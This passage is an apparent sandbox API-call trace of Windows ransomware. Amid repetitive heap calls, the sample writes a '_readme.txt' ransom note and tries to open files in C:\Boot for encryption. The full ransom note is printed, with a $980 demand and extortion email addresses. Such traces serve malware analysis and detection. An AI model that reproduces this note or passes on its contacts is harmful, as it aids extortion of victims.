dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.189] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.189] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.195] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.195] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.195] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.195] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.204] PathFindFileNameW (pszPath="C:\\Boot\\ko-KR\\") returned="ko-KR\\" [0179.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.204] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0179.204] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0179.204] PathFindFileNameW (pszPath="") returned="" [0179.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.204] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0179.204] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0179.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2d2ec90 [0179.205] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0179.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d154b0 [0179.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.205] FreeLibrary (hLibModule=0x759d0000) returned 1 [0179.205] PathAppendW (in: pszPath="C:\\Boot\\ko-KR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0179.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.205] PathFileExistsW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 0 [0179.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d32670 [0179.205] lstrcpyW (in: lpString1=0x2d32670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0179.205] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0179.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0179.205] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\_readme.txt" (normalized: "c:\\boot\\ko-kr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0179.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.212] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*" (normalized: "c:\\boot\\ko-kr\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0179.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.213] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.213] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0179.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.213] PathFindExtensionW (pszPath="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned=".mui" [0179.214] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0179.214] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0179.214] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0179.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0179.215] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0179.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0179.215] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0179.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.230] 